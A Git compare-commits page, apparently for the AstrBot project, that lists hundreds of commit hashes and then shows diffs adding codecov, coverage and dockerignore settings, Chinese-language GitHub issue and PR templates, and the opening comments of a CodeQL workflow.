Compare commits
789 Commits
publish2.1
...
v3.3.13
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
3b77df0556 | ||
|
|
1fa11062de | ||
|
|
6883de0f1c | ||
|
|
bdde0fe094 | ||
|
|
ab22b8103e | ||
|
|
641d5cd67b | ||
|
|
9fe941e457 | ||
|
|
78060c9985 | ||
|
|
5bd6af3400 | ||
|
|
4ecd78d6a8 | ||
|
|
7e9f54ed2c | ||
|
|
7dd29c707f | ||
|
|
a1489fb1f9 | ||
|
|
5f0f5398e8 | ||
|
|
e3b2396f32 | ||
|
|
6fd70ed26a | ||
|
|
a93e6ff01a | ||
|
|
6db8c38c58 | ||
|
|
d3d3ff7970 | ||
|
|
c5b2b30f79 | ||
|
|
ac2144d65b | ||
|
|
c620b4f919 | ||
|
|
292a3a43ba | ||
|
|
5fc4693b9c | ||
|
|
6dfbaf1b88 | ||
|
|
14c6e56287 | ||
|
|
7e48514f67 | ||
|
|
d8e70c4d7f | ||
|
|
fb52989d62 | ||
|
|
5b72ebaad5 | ||
|
|
98863ab901 | ||
|
|
b5cb5eb969 | ||
|
|
7f4f96f77b | ||
|
|
3b3f75f03e | ||
|
|
a5db4d4e47 | ||
|
|
d3b0f25cfe | ||
|
|
a9c6a68c5f | ||
|
|
c27f172452 | ||
|
|
2eeb5822c1 | ||
|
|
743046d48f | ||
|
|
d3a5205bde | ||
|
|
ae6dd8929a | ||
|
|
dcf96896ef | ||
|
|
67792100bb | ||
|
|
48c1263417 | ||
|
|
12d37381fe | ||
|
|
dcec3f5f84 | ||
|
|
32e2a7830a | ||
|
|
6992249e53 | ||
|
|
107214ac53 | ||
|
|
8a58772911 | ||
|
|
e21736b470 | ||
|
|
e8679f8984 | ||
|
|
970fe02027 | ||
|
|
12216853c5 | ||
|
|
33ec92258d | ||
|
|
a578edf137 | ||
|
|
f8949ebead | ||
|
|
141c91301f | ||
|
|
8d95e67b5a | ||
|
|
0633e7f25f | ||
|
|
266da0a9d8 | ||
|
|
121c40f273 | ||
|
|
a876efb95f | ||
|
|
95a8cc9498 | ||
|
|
f02731055e | ||
|
|
1df83addfc | ||
|
|
9db43ac5e6 | ||
|
|
0f470cf96f | ||
|
|
da3fcb7b86 | ||
|
|
73dd4703b9 | ||
|
|
0c679a0151 | ||
|
|
1d6ea2dbe6 | ||
|
|
933df57654 | ||
|
|
a7c87642b4 | ||
|
|
cbe761fc33 | ||
|
|
f8aef78d25 | ||
|
|
14dbdb2d83 | ||
|
|
abda226d63 | ||
|
|
a2dc6f0a49 | ||
|
|
7a94c26333 | ||
|
|
9b1ffb384b | ||
|
|
9566bfe122 | ||
|
|
89ff103bda | ||
|
|
6c788db53a | ||
|
|
344b5fa419 | ||
|
|
c6d161b837 | ||
|
|
2065ba0c60 | ||
|
|
a481fd1a3e | ||
|
|
c50bcdbdb9 | ||
|
|
36a2a7632c | ||
|
|
e77b7014e6 | ||
|
|
d57fd0f827 | ||
|
|
6a83d2a62a | ||
|
|
2d29726c18 | ||
|
|
b241b0f954 | ||
|
|
171dd1dc02 | ||
|
|
af62d969d7 | ||
|
|
c4fd9a66c6 | ||
|
|
d191997a39 | ||
|
|
853ac4c104 | ||
|
|
ed053acad6 | ||
|
|
f147634e51 | ||
|
|
e3b2a68341 | ||
|
|
84c450aef9 | ||
|
|
f52a0eb43a | ||
|
|
6ed7559518 | ||
|
|
d977dbe9a7 | ||
|
|
17fc761c61 | ||
|
|
af878f2ed3 | ||
|
|
bb2164c324 | ||
|
|
0496becc50 | ||
|
|
618f8aa7d2 | ||
|
|
c57f711c48 | ||
|
|
4edd11f2f7 | ||
|
|
a2cf058951 | ||
|
|
d52eb10ddd | ||
|
|
4b6dae71fc | ||
|
|
ddad30c22e | ||
|
|
77067c545c | ||
|
|
465d283cad | ||
|
|
05071144fb | ||
|
|
a4e7904953 | ||
|
|
986a8c7554 | ||
|
|
9272843b77 | ||
|
|
542d4bc703 | ||
|
|
e3640fdac9 | ||
|
|
f64ab4b190 | ||
|
|
bd571e1577 | ||
|
|
e4a5cbd893 | ||
|
|
7a9fd7fd1e | ||
|
|
d9b60108db | ||
|
|
8455c8b4ed | ||
|
|
5c2e7099fc | ||
|
|
1fd1d55895 | ||
|
|
5ce4137e75 | ||
|
|
d49179541e | ||
|
|
676f258981 | ||
|
|
fa44749240 | ||
|
|
6c856f9da2 | ||
|
|
e8773cea7f | ||
|
|
4d36ffcb08 | ||
|
|
c653e492c4 | ||
|
|
f08de1f404 | ||
|
|
1218691b61 | ||
|
|
61fc27ff79 | ||
|
|
123ee24f7e | ||
|
|
52c9045a28 | ||
|
|
f00f1e8933 | ||
|
|
8da4433e57 | ||
|
|
7babb87934 | ||
|
|
f67b171385 | ||
|
|
1780d1355d | ||
|
|
5a3390e4f3 | ||
|
|
337d96b41d | ||
|
|
38a1dfea98 | ||
|
|
fbef73aeec | ||
|
|
d6214c2b7c | ||
|
|
d58c86f6fc | ||
|
|
ea34c20198 | ||
|
|
934ca94e62 | ||
|
|
1775327c2e | ||
|
|
707fcad8b4 | ||
|
|
f143c5afc6 | ||
|
|
99f94b2611 | ||
|
|
e39c1f9116 | ||
|
|
235e0b9b8f | ||
|
|
d5a9bed8a4 | ||
|
|
d7dc8a7612 | ||
|
|
08cd3ca40c | ||
|
|
a13562dcea | ||
|
|
d7a0c0d1d0 | ||
|
|
c0729b2d29 | ||
|
|
a80f474290 | ||
|
|
699207dd54 | ||
|
|
e7708010c9 | ||
|
|
f66091e08f | ||
|
|
03bb932f8f | ||
|
|
fbf8b349e0 | ||
|
|
e9278fce6a | ||
|
|
9a7db956d5 | ||
|
|
13196dd667 | ||
|
|
52b80e24d2 | ||
|
|
7dff87e65d | ||
|
|
31ee64d1b2 | ||
|
|
8e865b6918 | ||
|
|
66f91e5832 | ||
|
|
cd2d368f9c | ||
|
|
7736c1c9bd | ||
|
|
6728c0b7b5 | ||
|
|
344f92e0e7 | ||
|
|
fdabfef6a7 | ||
|
|
6c5718f134 | ||
|
|
edfde51434 | ||
|
|
3fc1347bba | ||
|
|
e643eea365 | ||
|
|
1af481f5f9 | ||
|
|
317d1c4c41 | ||
|
|
a703860512 | ||
|
|
1cd1c8ea0d | ||
|
|
53ef3bbf4f | ||
|
|
ab7b8aad7c | ||
|
|
c49213282b | ||
|
|
3c87fc5b31 | ||
|
|
9684508e1d | ||
|
|
bb0edae200 | ||
|
|
acb68a4a1e | ||
|
|
46dd6f3243 | ||
|
|
ecab072890 | ||
|
|
148534d3c2 | ||
|
|
1278f16973 | ||
|
|
7d9b3c6c5c | ||
|
|
83dcb5165c | ||
|
|
30862bb82f | ||
|
|
6c0bda8feb | ||
|
|
e14dece206 | ||
|
|
680593d636 | ||
|
|
144440214f | ||
|
|
6667b58a3f | ||
|
|
b55d9533be | ||
|
|
3484fc60e6 | ||
|
|
eac0265522 | ||
|
|
ac74431633 | ||
|
|
4c098200be | ||
|
|
2cf18972f3 | ||
|
|
d522d2a6a9 | ||
|
|
7079ce096f | ||
|
|
5e8c5067b1 | ||
|
|
570ff4e8b6 | ||
|
|
e2f1362a1f | ||
|
|
3519e38211 | ||
|
|
08734250f7 | ||
|
|
e8407f6449 | ||
|
|
04f3400f83 | ||
|
|
89c8b3e7fc | ||
|
|
66294100ec | ||
|
|
8ed8a23c8b | ||
|
|
449b0b03b5 | ||
|
|
d93754bf1d | ||
|
|
a007a61ecc | ||
|
|
e481377317 | ||
|
|
4c5831c7b4 | ||
|
|
fc54b5237f | ||
|
|
f8f42678d1 | ||
|
|
38b1f4128c | ||
|
|
04fb4f88ad | ||
|
|
4675f5df08 | ||
|
|
34ee358d40 | ||
|
|
c4cfd1a3e2 | ||
|
|
5ac4748537 | ||
|
|
2e5ec1d2dc | ||
|
|
bac4c069d7 | ||
|
|
9d4a21a10b | ||
|
|
dbeb41195d | ||
|
|
71f4998458 | ||
|
|
40af5b7574 | ||
|
|
e7a1020f82 | ||
|
|
018e49ed95 | ||
|
|
582cfe9f7c | ||
|
|
db07f740b3 | ||
|
|
bacbd351d7 | ||
|
|
7e2c61c661 | ||
|
|
3df30fd4de | ||
|
|
92789ffdc9 | ||
|
|
09b746cdec | ||
|
|
8ace7b59e3 | ||
|
|
1fc0248d8f | ||
|
|
57bde33bfe | ||
|
|
1b1e558a3b | ||
|
|
c5c7e686d0 | ||
|
|
bd28f880f6 | ||
|
|
fe2ab69773 | ||
|
|
75f9d383cb | ||
|
|
5fefba4583 | ||
|
|
780d126437 | ||
|
|
4057dd9f5b | ||
|
|
b5f8df4bb6 | ||
|
|
5ace10d39f | ||
|
|
07ecdedf0d | ||
|
|
c2ca365312 | ||
|
|
8b9ca08903 | ||
|
|
16e6b588f6 | ||
|
|
3a1d5d8904 | ||
|
|
84d1293fd0 | ||
|
|
a12be7fa77 | ||
|
|
6eee4f678f | ||
|
|
0e53c95c06 | ||
|
|
3ba97ad0dc | ||
|
|
99ff8bc1f5 | ||
|
|
63aa6ee9a5 | ||
|
|
925a42e2c4 | ||
|
|
8dc91cfed4 | ||
|
|
9c6bdeea9d | ||
|
|
f5857aaa0c | ||
|
|
9bc8ac10fa | ||
|
|
3df3879954 | ||
|
|
be1f8e7075 | ||
|
|
d602041ad0 | ||
|
|
23882bcb8e | ||
|
|
311178189f | ||
|
|
5a57526aab | ||
|
|
450dd34f4d | ||
|
|
89ed31a888 | ||
|
|
9fe031efe3 | ||
|
|
baa57266b4 | ||
|
|
3e4818d0ee | ||
|
|
b36747c728 | ||
|
|
fdbe993913 | ||
|
|
f4222e0923 | ||
|
|
f0caea9026 | ||
|
|
9c3c8ff2c4 | ||
|
|
aaefdab0aa | ||
|
|
f18a311bc2 | ||
|
|
ad9705f9c4 | ||
|
|
fb0b626813 | ||
|
|
b48fbf10e1 | ||
|
|
4aa2eab8b6 | ||
|
|
3960a19bcb | ||
|
|
b3cec4781b | ||
|
|
8f0b0bf0d0 | ||
|
|
847672d7f1 | ||
|
|
c7f2962654 | ||
|
|
752201cb46 | ||
|
|
deebf61b5f | ||
|
|
d5e5b06e86 | ||
|
|
cb5975c102 | ||
|
|
5b1aee1b4d | ||
|
|
510c8b4236 | ||
|
|
89fc7b0553 | ||
|
|
123c21fcb3 | ||
|
|
75d62d66f9 | ||
|
|
23a8e989a5 | ||
|
|
9577e637f1 | ||
|
|
e51ef2201b | ||
|
|
f4ae503abf | ||
|
|
3424b658f3 | ||
|
|
3198f73f3d | ||
|
|
aa3262a8ab | ||
|
|
6acd7be547 | ||
|
|
fb7669ddad | ||
|
|
f2c4ef126e | ||
|
|
33dcc4c152 | ||
|
|
b9e331ebd6 | ||
|
|
7832ec386e | ||
|
|
b9828428cc | ||
|
|
da11034aec | ||
|
|
578c9e0695 | ||
|
|
cc675a9b4f | ||
|
|
08e7d4d0c6 | ||
|
|
553f1b8d83 | ||
|
|
73e7e2088d | ||
|
|
e40c9de610 | ||
|
|
2f4e0bb4f2 | ||
|
|
191976e22e | ||
|
|
52656b8586 | ||
|
|
998e29ded6 | ||
|
|
5bbe3f12d6 | ||
|
|
56aea81ed7 | ||
|
|
7b8a311dde | ||
|
|
b75d20a3e8 | ||
|
|
67faa587b6 | ||
|
|
15fde686d4 | ||
|
|
741284f6e8 | ||
|
|
8352fc269b | ||
|
|
5852f36557 | ||
|
|
cc1c723c12 | ||
|
|
adf5cbfeba | ||
|
|
d6d0516c9a | ||
|
|
8aab10aaf3 | ||
|
|
4fe5616ae1 | ||
|
|
7e1c76a3f5 | ||
|
|
f74665ff71 | ||
|
|
a96d64fe88 | ||
|
|
fd2aa0cba6 | ||
|
|
a92ea3db02 | ||
|
|
d7a513b640 | ||
|
|
8a017ff693 | ||
|
|
7d08f57b32 | ||
|
|
6f4ad7890b | ||
|
|
37488118a6 | ||
|
|
b2da0778ae | ||
|
|
cc887a5037 | ||
|
|
ca86a02d30 | ||
|
|
d652dc19a6 | ||
|
|
6a56b7bff5 | ||
|
|
81e8997852 | ||
|
|
372a204ba9 | ||
|
|
15ad5aae35 | ||
|
|
fd2e9ef93f | ||
|
|
5be3bf1f46 | ||
|
|
4915c2d480 | ||
|
|
bd56a19ac5 | ||
|
|
da8fa2d905 | ||
|
|
f56fd100d7 | ||
|
|
b725a1a20c | ||
|
|
ff1b5d02d2 | ||
|
|
d4882a8240 | ||
|
|
e37f84c1ae | ||
|
|
a23bd0a63c | ||
|
|
ae00e84974 | ||
|
|
53b3250978 | ||
|
|
7f15a59a4e | ||
|
|
6a164c9961 | ||
|
|
bd779a3df3 | ||
|
|
9ebb340c00 | ||
|
|
e8edbaae2d | ||
|
|
2aab1f4c96 | ||
|
|
90ea621c65 | ||
|
|
34bdceb41b | ||
|
|
6d2ded1c6c | ||
|
|
9b926048ca | ||
|
|
9cf4f0f57d | ||
|
|
9123b9d773 | ||
|
|
f9258ae1e1 | ||
|
|
d8808de4a9 | ||
|
|
afcb152d8d | ||
|
|
ff01174a1f | ||
|
|
71f1625284 | ||
|
|
19e3390083 | ||
|
|
3015b90e12 | ||
|
|
aa419f3ef9 | ||
|
|
954236c284 | ||
|
|
72d6b3886b | ||
|
|
a95046ecaf | ||
|
|
ccdb11575b | ||
|
|
7e68b2f2be | ||
|
|
39efab1081 | ||
|
|
cc6707c8ce | ||
|
|
09080adf84 | ||
|
|
4cc72030c0 | ||
|
|
a395902184 | ||
|
|
5156f0584a | ||
|
|
be171fe0d7 | ||
|
|
ad4bf5e654 | ||
|
|
da7429ad62 | ||
|
|
b5f20ee282 | ||
|
|
a9023d6f3a | ||
|
|
628b661a18 | ||
|
|
638fe466f8 | ||
|
|
a90adcf15c | ||
|
|
7896066db6 | ||
|
|
b1314bcc31 | ||
|
|
b1ecc929f2 | ||
|
|
3aad42a886 | ||
|
|
b6e87d3d31 | ||
|
|
461eb4b9c7 | ||
|
|
a89e92d5cc | ||
|
|
6e69e88e91 | ||
|
|
ae732c1dac | ||
|
|
8e4a72c97b | ||
|
|
bf0d82fe67 | ||
|
|
987383f957 | ||
|
|
c2cacf3281 | ||
|
|
72878477dc | ||
|
|
ad0d14420a | ||
|
|
5a7c60c81e | ||
|
|
6011840d1f | ||
|
|
9a2dffe299 | ||
|
|
e6770d2b12 | ||
|
|
255db6ee57 | ||
|
|
aa9ff99557 | ||
|
|
5f024e9f30 | ||
|
|
cbdc7b7ce4 | ||
|
|
5f636ca061 | ||
|
|
9fa3651170 | ||
|
|
bba66788c3 | ||
|
|
200f3cce00 | ||
|
|
938490b739 | ||
|
|
e77e7b050a | ||
|
|
bd2dbe5b63 | ||
|
|
c684d9cb4a | ||
|
|
7a39a9d45e | ||
|
|
2a3bb068db | ||
|
|
1aa4384ca3 | ||
|
|
3b26b7b26c | ||
|
|
3b097d662b | ||
|
|
c3acb3e77f | ||
|
|
55d58d30a8 | ||
|
|
020a8ace9f | ||
|
|
15f56ffc01 | ||
|
|
3724659b32 | ||
|
|
df77152581 | ||
|
|
339ea5f12a | ||
|
|
36f96ccc97 | ||
|
|
190e0a4971 | ||
|
|
72638fac68 | ||
|
|
807d19e381 | ||
|
|
10870172b4 | ||
|
|
1f7d3eccf9 | ||
|
|
5fc58123bb | ||
|
|
c84c9f4aaa | ||
|
|
cabe66fc0a | ||
|
|
9f1315b06d | ||
|
|
6f27f59730 | ||
|
|
17815e7fe3 | ||
|
|
596ae80fea | ||
|
|
be2dc6ba70 | ||
|
|
e5aa8c8270 | ||
|
|
7c5ac41c55 | ||
|
|
c6cf1153c1 | ||
|
|
a68338b651 | ||
|
|
bab46e912e | ||
|
|
4b158a1c89 | ||
|
|
6894900e46 | ||
|
|
2e11d6e007 | ||
|
|
348381be15 | ||
|
|
9024c28e70 | ||
|
|
ae1702901b | ||
|
|
c1c0df85e6 | ||
|
|
f3c6d9c02b | ||
|
|
811a885411 | ||
|
|
b4ec28b71c | ||
|
|
cdf4a5321b | ||
|
|
d83f155f80 | ||
|
|
4c402ed5bd | ||
|
|
ec5aff8d0b | ||
|
|
eae0d6c422 | ||
|
|
9c284b84b1 | ||
|
|
9f36e5ae05 | ||
|
|
7caa380e54 | ||
|
|
41d81bb60e | ||
|
|
454a74f4e1 | ||
|
|
c5bdad02e5 | ||
|
|
f46de3d518 | ||
|
|
a3e21bea1a | ||
|
|
d7e4707d5d | ||
|
|
a78ebf2fd7 | ||
|
|
bd11541678 | ||
|
|
0d99aa81e6 | ||
|
|
f104d40d0a | ||
|
|
0d69f8ab8a | ||
|
|
66d1fc08b6 | ||
|
|
e32fc27728 | ||
|
|
eec890cd02 | ||
|
|
d30881e59b | ||
|
|
9afaf83368 | ||
|
|
33f9a9cfa0 | ||
|
|
bf72d5fa27 | ||
|
|
567c29bcd6 | ||
|
|
dcdfe453fb | ||
|
|
0d23c0900b | ||
|
|
86eda7bdf8 | ||
|
|
1e46525b0f | ||
|
|
8d41efea4d | ||
|
|
f15d0eb0eb | ||
|
|
1795362bcd | ||
|
|
2bf9c82617 | ||
|
|
33793a2053 | ||
|
|
656fe14af4 | ||
|
|
46197d49a4 | ||
|
|
843ab56f50 | ||
|
|
6b4b52f3c5 | ||
|
|
392e5cd592 | ||
|
|
d273019830 | ||
|
|
fd59ec4b6c | ||
|
|
bf33ccafca | ||
|
|
425936872d | ||
|
|
6627b2e1e5 | ||
|
|
323c2cecf8 | ||
|
|
5b1dd3dce9 | ||
|
|
54af770dfb | ||
|
|
30a48fea6e | ||
|
|
cfd5fb1452 | ||
|
|
a78984376f | ||
|
|
9887cae43c | ||
|
|
e63fe60f8d | ||
|
|
b0ac2d676c | ||
|
|
5ef515165c | ||
|
|
e21d43f920 | ||
|
|
3a80ffad88 | ||
|
|
47506d60cd | ||
|
|
b999b712b7 | ||
|
|
6860ba3f05 | ||
|
|
02594867c0 | ||
|
|
250435f3e7 | ||
|
|
3c593fb6f7 | ||
|
|
807cad5c48 | ||
|
|
e92ecdd3f8 | ||
|
|
1c91079d8f | ||
|
|
376b2fef40 | ||
|
|
300f3b6df8 | ||
|
|
6e6f6d5cd4 | ||
|
|
077e54d0f1 | ||
|
|
18ffaa2b91 | ||
|
|
a6555681a0 | ||
|
|
43ac0ef87c | ||
|
|
754842be7c | ||
|
|
5b3ee2dbe8 | ||
|
|
ca5a1ddc0b | ||
|
|
c9821132ad | ||
|
|
0641dca2a6 | ||
|
|
fd983b9f5d | ||
|
|
7e1e51c450 | ||
|
|
d912b990e4 | ||
|
|
8224aa87a5 | ||
|
|
4cb5abc7b6 | ||
|
|
743a800b0d | ||
|
|
a5c43612bf | ||
|
|
e2bd612b8e | ||
|
|
3ddb65e399 | ||
|
|
56775580fc | ||
|
|
8f7703c158 | ||
|
|
7aba9ff3ff | ||
|
|
aea1271a94 | ||
|
|
b575f195c9 | ||
|
|
1eedf7b332 | ||
|
|
d327a1041b | ||
|
|
10a3ba7dd4 | ||
|
|
deaa4ea910 | ||
|
|
fbfceb3137 | ||
|
|
e7b9d7cd54 | ||
|
|
34aba58351 | ||
|
|
e1639be6c3 | ||
|
|
80975c5715 | ||
|
|
c12a4f7353 | ||
|
|
defab688e5 | ||
|
|
2244386d33 | ||
|
|
39244fa27f | ||
|
|
20c19905ac | ||
|
|
8086d645f9 | ||
|
|
3a3289bf04 | ||
|
|
1711ff3bb5 | ||
|
|
b945913f88 | ||
|
|
d31533ed82 | ||
|
|
0fb2ec2c76 | ||
|
|
89847cbc83 | ||
|
|
9d12bb23fd | ||
|
|
79af4ce381 | ||
|
|
79f293e248 | ||
|
|
e75a0fec01 | ||
|
|
a935b085d4 | ||
|
|
4ef0a14420 | ||
|
|
8273154904 | ||
|
|
71d6ef3b52 | ||
|
|
119b3a090a | ||
|
|
496df3347b | ||
|
|
2b70eef35b | ||
|
|
c4071eedf8 | ||
|
|
b6cc866113 | ||
|
|
6aabcdeac7 | ||
|
|
72bccee9e2 | ||
|
|
b54f934fcd | ||
|
|
43dc0f96ff | ||
|
|
e02a82fa72 | ||
|
|
9f91b0c92b | ||
|
|
d14d6364a3 | ||
|
|
15c8f0b6f7 | ||
|
|
9bca158174 | ||
|
|
45bb30692d | ||
|
|
5bf73caba7 | ||
|
|
e5389f620a | ||
|
|
61fd52ff61 | ||
|
|
73c46bd812 | ||
|
|
d8173122e0 | ||
|
|
1af6e77dd1 | ||
|
|
ce476ca163 | ||
|
|
0a1df90a83 | ||
|
|
762f5ea30f | ||
|
|
06e7753797 | ||
|
|
c5e1f8d3e9 | ||
|
|
221433725b | ||
|
|
28864cd066 | ||
|
|
854f70dc8b | ||
|
|
435b988223 | ||
|
|
ecc119b296 | ||
|
|
209f3aa136 | ||
|
|
8935859934 | ||
|
|
6c77ec3534 | ||
|
|
291d3ebae8 | ||
|
|
5b97fd2e6f | ||
|
|
4de8c5ed7d | ||
|
|
09333d1604 | ||
|
|
60240ca9a1 | ||
|
|
3e45ec0a08 | ||
|
|
4aad04b31a | ||
|
|
99ff3f8d42 | ||
|
|
f9a7a723aa | ||
|
|
7bb4ad648a | ||
|
|
7c3cb98cf8 | ||
|
|
0cc6bc0f1d | ||
|
|
4181d62b5c | ||
|
|
7a1c0b0821 | ||
|
|
b74d32c2c8 | ||
|
|
e320bb5ab8 | ||
|
|
076cfd3e97 | ||
|
|
515a937c07 | ||
|
|
2c5451120e | ||
|
|
e6f6bee7ee | ||
|
|
1a137a8639 | ||
|
|
c8f6d090cc | ||
|
|
b7b7877dfc | ||
|
|
608bd0398e | ||
|
|
2541663b77 | ||
|
|
5d774f3d7b | ||
|
|
6ea1366e73 | ||
|
|
134a8e233a | ||
|
|
6ccfc674a5 | ||
|
|
37e9373561 | ||
|
|
bfa8f137de | ||
|
|
66a85cddf5 | ||
|
|
bf84e74490 | ||
|
|
3d8f96ef8a | ||
|
|
84c57a47ad | ||
|
|
5e101bb3c0 | ||
|
|
246fbd6337 | ||
|
|
9938e4392a | ||
|
|
10cda13213 | ||
|
|
f3722b31d5 | ||
|
|
673a4e2c7f | ||
|
|
1d8fba05b6 | ||
|
|
7c06883975 | ||
|
|
6da12b7a67 | ||
|
|
0342d752e6 | ||
|
|
a851e34c94 | ||
|
|
ad8aed5724 | ||
|
|
75101bf270 | ||
|
|
43df7003d6 | ||
|
|
502703b749 | ||
|
|
8365f39f95 | ||
|
|
aa5f8db59d | ||
|
|
d2b60b72d9 | ||
|
|
14c36ceb52 | ||
|
|
cdc3bdd769 | ||
|
|
48d0c2a8c8 | ||
|
|
6923979014 | ||
|
|
03239439c9 | ||
|
|
da3381a887 | ||
|
|
a1253cc241 | ||
|
|
ffe10cc5c2 | ||
|
|
7093cf5ab8 | ||
|
|
979a0cdd2e | ||
|
|
b495a11d1f | ||
|
|
8698e87e51 | ||
|
|
6d2f9e5ba8 | ||
|
|
0e24e107d6 | ||
|
|
888a4e89ab | ||
|
|
1a55684ae8 | ||
|
|
858712dcbc | ||
|
|
ad4d068bbc | ||
|
|
0f5a2101b7 | ||
|
|
7bc9d8dc7b | ||
|
|
506a62e6e6 | ||
|
|
44e22087d8 | ||
|
|
d88c06578d | ||
|
|
93bc12a89c | ||
|
|
eedcb9b825 | ||
|
|
b8fe50a196 | ||
|
|
10b1538118 | ||
|
|
09cfd18f6f | ||
|
|
d01be66344 | ||
|
|
c0e4d0595b | ||
|
|
d403323a36 | ||
|
|
3092bbd210 | ||
|
|
9d2cd27705 | ||
|
|
ec48b57358 | ||
|
|
54cdca01d3 | ||
|
|
4b35f7f8fd | ||
|
|
651ba7b3d6 | ||
|
|
cd1390d449 | ||
|
|
d478ff02b6 | ||
|
|
1da3a19ddd | ||
|
|
db66cbfb9c | ||
|
|
51729f4a50 | ||
|
|
d739abef60 | ||
|
|
2ecb3fc7cf | ||
|
|
69c576086e | ||
|
|
a833812738 | ||
|
|
b557bc1ec7 | ||
|
|
8ea7f42a1f | ||
|
|
9d553145ca | ||
|
|
a38f3b9c28 | ||
|
|
9122b33fd0 | ||
|
|
91c6767522 | ||
|
|
5cf8df572a | ||
|
|
64bfac00a9 | ||
|
|
7407ac0ce1 | ||
|
|
0bb0493404 | ||
|
|
4366572675 | ||
|
|
ffa3a0be3f | ||
|
|
4dc214b27e | ||
|
|
2baee48ff7 | ||
|
|
74ae9cbee0 | ||
|
|
1bfa325a6c | ||
|
|
5663c1d6b2 | ||
|
|
9a96456a77 | ||
|
|
9f741ef749 | ||
|
|
dadaa10924 | ||
|
|
6b596dcb12 | ||
|
|
6d4d2bf84d |
3
.codecov.yml
Normal file
@@ -0,0 +1,3 @@
|
||||
comment:
|
||||
layout: "condensed_header, condensed_files, condensed_footer"
|
||||
hide_project_coverage: TRUE
|
||||
5
.coveragerc
Normal file
@@ -0,0 +1,5 @@
|
||||
[run]
|
||||
omit =
|
||||
*/site-packages/*
|
||||
*/dist-packages/*
|
||||
your_package_name/tests/*
|
||||
18
.dockerignore
Normal file
@@ -0,0 +1,18 @@
|
||||
# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm
|
||||
# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
|
||||
# github acions
|
||||
.github/
|
||||
.*ignore
|
||||
.git/
|
||||
# User-specific stuff
|
||||
.idea/
|
||||
# Byte-compiled / optimized / DLL files
|
||||
__pycache__/
|
||||
# Environments
|
||||
.env
|
||||
.venv
|
||||
env/
|
||||
venv*/
|
||||
ENV/
|
||||
.conda/
|
||||
README*.md
|
||||
82
.github/ISSUE_TEMPLATE/bug-report.yml
vendored
Normal file
@@ -0,0 +1,82 @@
|
||||
name: '🐛 报告 Bug'
|
||||
title: '[Bug]'
|
||||
description: 提交报告帮助我们改进。
|
||||
labels: [ 'bug' ]
|
||||
body:
|
||||
- type: markdown
|
||||
attributes:
|
||||
value: |
|
||||
感谢您抽出时间报告问题!请准确解释您的问题。如果可能,请提供一个可复现的片段(这有助于更快地解决问题)。
|
||||
- type: textarea
|
||||
attributes:
|
||||
label: 发生了什么
|
||||
description: 描述你遇到的异常
|
||||
placeholder: >
|
||||
一个清晰且具体的描述这个异常是什么。
|
||||
validations:
|
||||
required: true
|
||||
|
||||
- type: textarea
|
||||
attributes:
|
||||
label: 如何复现?
|
||||
description: >
|
||||
复现该问题的步骤
|
||||
placeholder: >
|
||||
如: 1. 打开 '...'
|
||||
validations:
|
||||
required: true
|
||||
|
||||
- type: textarea
|
||||
attributes:
|
||||
label: AstrBot 版本与部署方式
|
||||
description: >
|
||||
请提供您的 AstrBot 版本和部署方式。
|
||||
placeholder: >
|
||||
如: 3.1.8 Docker, 3.1.7 Windows启动器
|
||||
validations:
|
||||
required: true
|
||||
|
||||
- type: dropdown
|
||||
attributes:
|
||||
label: 操作系统
|
||||
description: |
|
||||
你在哪个操作系统上遇到了这个问题?
|
||||
multiple: false
|
||||
options:
|
||||
- 'Windows'
|
||||
- 'macOS'
|
||||
- 'Linux'
|
||||
- 'Other'
|
||||
- 'Not sure'
|
||||
validations:
|
||||
required: true
|
||||
|
||||
- type: textarea
|
||||
attributes:
|
||||
label: 额外信息
|
||||
description: >
|
||||
任何额外信息,如报错日志、截图等。
|
||||
placeholder: >
|
||||
请提供完整的报错日志或截图。
|
||||
validations:
|
||||
required: true
|
||||
|
||||
- type: checkboxes
|
||||
attributes:
|
||||
label: 你愿意提交 PR 吗?
|
||||
description: >
|
||||
这绝对不是必需的,但我们很乐意在贡献过程中为您提供指导特别是如果你已经很好地理解了如何实现修复。
|
||||
options:
|
||||
- label: 是的,我愿意提交 PR!
|
||||
|
||||
- type: checkboxes
|
||||
attributes:
|
||||
label: Code of Conduct
|
||||
options:
|
||||
- label: >
|
||||
我已阅读并同意遵守该项目的 [行为准则](https://docs.github.com/zh/site-policy/github-terms/github-community-code-of-conduct)。
|
||||
required: true
|
||||
|
||||
- type: markdown
|
||||
attributes:
|
||||
value: "感谢您填写我们的表单!"
|
||||
42
.github/ISSUE_TEMPLATE/feature-request.yml
vendored
Normal file
@@ -0,0 +1,42 @@
|
||||
|
||||
name: '🎉 功能建议'
|
||||
title: "[Feature]"
|
||||
description: 提交建议帮助我们改进。
|
||||
labels: [ "enhancement" ]
|
||||
body:
|
||||
- type: markdown
|
||||
attributes:
|
||||
value: |
|
||||
感谢您抽出时间提出新功能建议,请准确解释您的想法。
|
||||
|
||||
- type: textarea
|
||||
attributes:
|
||||
label: 描述
|
||||
description: 简短描述您的功能建议。
|
||||
|
||||
- type: textarea
|
||||
attributes:
|
||||
label: 使用场景
|
||||
description: 你想要发生什么?
|
||||
placeholder: >
|
||||
一个清晰且具体的描述这个功能的使用场景。
|
||||
|
||||
- type: checkboxes
|
||||
attributes:
|
||||
label: 你愿意提交PR吗?
|
||||
description: >
|
||||
这不是必须的,但我们欢迎您的贡献。
|
||||
options:
|
||||
- label: 是的, 我愿意提交PR!
|
||||
|
||||
- type: checkboxes
|
||||
attributes:
|
||||
label: Code of Conduct
|
||||
options:
|
||||
- label: >
|
||||
我已阅读并同意遵守该项目的 [行为准则](https://docs.github.com/zh/site-policy/github-terms/github-community-code-of-conduct)。
|
||||
required: true
|
||||
|
||||
- type: markdown
|
||||
attributes:
|
||||
value: "感谢您填写我们的表单!"
|
||||
10
.github/PULL_REQUEST_TEMPLATE.md
vendored
Normal file
@@ -0,0 +1,10 @@
|
||||
<!-- 如果有的话,指定这个 PR 要解决的 ISSUE -->
|
||||
修复了 #XYZ
|
||||
|
||||
### Motivation
|
||||
|
||||
<!--解释为什么要改动-->
|
||||
|
||||
### Modifications
|
||||
|
||||
<!--简单解释你的改动-->
|
||||
93
.github/workflows/codeql.yml
vendored
Normal file
@@ -0,0 +1,93 @@
|
||||
# For most projects, this workflow file will not need changing; you simply need
|
||||
# to commit it to your repository.
|
||||
#
|
||||
# You may wish to alter this file to override the set of languages analyzed,
|
||||
# or to provide custom queries or build logic.
|
